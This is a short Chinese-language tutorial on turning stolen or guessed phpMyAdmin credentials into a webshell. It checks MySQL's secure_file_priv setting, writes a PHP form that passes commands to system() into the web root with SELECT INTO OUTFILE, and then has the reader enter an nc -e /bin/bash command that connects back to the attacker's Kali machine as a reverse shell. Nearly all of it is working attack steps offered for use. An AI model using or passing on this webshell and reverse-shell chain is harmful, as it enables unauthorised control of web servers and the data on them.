利用phpmyadmin拿Webshell
利用phpmyadmin拿Webshell
当拿到phpmyadmin的用户名密码后,如何拿到webshell呢,步骤如下:
-
确认可以通过phpmyadmin写入文件,执行SQL语句:
show global variables like "secure%";
secure_file_priv:
值为NULL表示禁止限制操作
值为某一目录,则只能操作该目录下的文件
没有值则表示不对读写文件进行限制
-
执行下面的SQL语句,生成webshell文件:
SELECT '<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET["cmd"]) {system($_GET["cmd"]);} ?> </pre></BODY></HTML>' INTO OUTFILE '/var/www/html/huawen.php'
-
此时在输入框中输入nc -e /bin/bash <kali linux IP 地址> <端口>
STRIVE FOR PROGRESS,NOT FOR PERFECTION